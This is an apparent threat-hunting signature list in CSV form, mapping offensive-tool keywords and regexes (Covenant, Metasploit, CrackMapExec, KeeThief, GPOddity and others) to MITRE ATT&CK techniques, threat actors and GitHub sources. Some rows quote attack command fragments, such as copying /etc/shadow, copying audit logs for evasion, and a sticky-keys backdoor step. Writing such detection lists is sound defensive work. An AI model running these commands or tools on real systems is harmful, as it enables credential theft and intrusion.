"*CoreSecurity/impacket/*",".{0,1000}CoreSecurity\/impacket\/.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","38899"
"*corrupt data that was marshalled by Ndr64ConformantVaryingArrayMarshall*",".{0,1000}corrupt\sdata\sthat\swas\smarshalled\sby\sNdr64ConformantVaryingArrayMarshall.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","#content","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","38900"
"*corscanner -i urls.txt -t 100*",".{0,1000}corscanner\s\-i\surls\.txt\s\-t\s100.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38901"
"*Could not find address marker in shellcode*",".{0,1000}Could\snot\sfind\saddress\smarker\sin\sshellcode.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#content","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","38902"
"*Could not parse .dmp file with pypykatz*",".{0,1000}Could\snot\sparse\s\.dmp\sfile\swith\spypykatz.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","38903"
"*Could not run AMSI bypass.*",".{0,1000}Could\snot\srun\sAMSI\sbypass\..{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#content","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","38904"
"*Could not spoof binary: *",".{0,1000}Could\snot\sspoof\sbinary\:\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","38905"
"*Could not write NTLM Hashes to the specified JTR_Dump_Path *",".{0,1000}Could\snot\swrite\sNTLM\sHashes\sto\sthe\sspecified\sJTR_Dump_Path\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","38906"
"*Could not write NTLM Hashes to the specified JTR_Dump_Path*",".{0,1000}Could\snot\swrite\sNTLM\sHashes\sto\sthe\sspecified\sJTR_Dump_Path.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","38907"
"*Couldn't clone GPO {} (maybe it does not exist?*",".{0,1000}Couldn\'t\sclone\sGPO\s\{\}\s\(maybe\sit\sdoes\snot\sexist\?.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","38908"
"*Covenant.API*",".{0,1000}Covenant\.API.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38909"
"*Covenant.csproj*",".{0,1000}Covenant\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38910"
"*Covenant.exe*",".{0,1000}Covenant\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38911"
"*Covenant.Models*",".{0,1000}Covenant\.Models.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38912"
"*Covenant.sln*",".{0,1000}Covenant\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38913"
"*Covenant/Covenant*",".{0,1000}Covenant\/Covenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38914"
"*Covenant/wwwroot*",".{0,1000}Covenant\/wwwroot.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38915"
"*CovenantAPI.*",".{0,1000}CovenantAPI\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38916"
"*CovenantAPIExtensions.*",".{0,1000}CovenantAPIExtensions\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38917"
"*CovenantBaseMenuItem.*",".{0,1000}CovenantBaseMenuItem\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38918"
"*CovenantService.cs*",".{0,1000}CovenantService\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38919"
"*CovenantUser.cs*",".{0,1000}CovenantUser\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38920"
"*CovenantUserLogin.*",".{0,1000}CovenantUserLogin\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38921"
"*CovenantUserLoginResult.*",".{0,1000}CovenantUserLoginResult\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38922"
"*CovenantUserRegister.*",".{0,1000}CovenantUserRegister\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38923"
"*covid19_koadic.profile*",".{0,1000}covid19_koadic\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","38924"
"*cow-branded-longhorn.txt*",".{0,1000}cow\-branded\-longhorn\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38925"
"*cowpatty -f *.txt -r *.cap -s *",".{0,1000}cowpatty\s\-f\s.{0,1000}\.txt\s\-r\s.{0,1000}\.cap\s\-s\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38926"
"*Cowpatty*",".{0,1000}Cowpatty.{0,1000}","offensive_tool_keyword","Cowpatty","coWPAtty - Brute-force dictionary attack against WPA-PSK.","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/joswr1ght/cowpatty","1","1","N/A","network exploitation tool","N/A","3","207","51","2018-12-04T22:26:47Z","2017-08-14T20:33:22Z","38927"
"*cowsay -f dragon 'PEzor!!*",".{0,1000}cowsay\s\-f\sdragon\s\'PEzor!!.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","38928"
"*cp ""/media/windows/Windows/System32/cmd.exe"" ""/media/windows/Windows/System32/*",".{0,1000}cp\s\""\/media\/windows\/Windows\/System32\/cmd\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","38929"
"*cp /etc/shadow /tmp/.*",".{0,1000}cp\s\/etc\/shadow\s\/tmp\/\..{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38933"
"*cp /var/log/audit/audit.log .tmp*",".{0,1000}cp\s\/var\/log\/audit\/audit\.log\s\.tmp.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","38935"
"*cp sliver-* /opt/tools/bin*",".{0,1000}cp\ssliver\-.{0,1000}\s\/opt\/tools\/bin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38939"
"*cpp_test_payload.exe*",".{0,1000}cpp_test_payload\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","38940"
"*Cr3dOv3r*",".{0,1000}Cr3dOv3r.{0,1000}","offensive_tool_keyword","Cr3dOv3r","Know the dangers of credential reuse attacks.","T1110 - T1555 - T1003","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/D4Vinci/Cr3dOv3r","1","1","N/A","N/A","N/A","10","2050","413","2024-10-14T19:20:12Z","2017-11-13T20:49:57Z","38943"
"*cracf2john.py*",".{0,1000}cracf2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","38944"
"*crack_databases.rb*",".{0,1000}crack_databases\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38945"
"*crack_it(nt_hash, lm_pass)*",".{0,1000}crack_it\(nt_hash,\slm_pass\).{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","#content","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","38946"
"*crack_windows.rb*",".{0,1000}crack_windows\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38947"
"*Crack-allDBs.git*",".{0,1000}Crack\-allDBs\.git.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","38948"
"*Crack-allDBs-main*",".{0,1000}Crack\-allDBs\-main.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","38949"
"*crack-allDBs-v1.py*",".{0,1000}crack\-allDBs\-v1\.py.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","38950"
"*crack-allDBs-v2.py*",".{0,1000}crack\-allDBs\-v2\.py.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","38951"
"*Cracked5pider/KaynLdr*",".{0,1000}Cracked5pider\/KaynLdr.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","38952"
"*Cracked5pider/KaynStrike*",".{0,1000}Cracked5pider\/KaynStrike.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","38953"
"*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *",".{0,1000}crackhound\.py\s\-\-verbose\s\-\-password\s.{0,1000}\s\-\-plain\-text\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-file\s.{0,1000}\s\-\-add\-password\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38954"
"*cracklord-master.*",".{0,1000}cracklord\-master\..{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","38955"
"*cracklord-queued*_amd64.deb*",".{0,1000}cracklord\-queued.{0,1000}_amd64\.deb.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","38956"
"*cracklord-resourced*_amd64.deb*",".{0,1000}cracklord\-resourced.{0,1000}_amd64\.deb.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","38957"
"*crackmapexec*",".{0,1000}crackmapexec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38958"
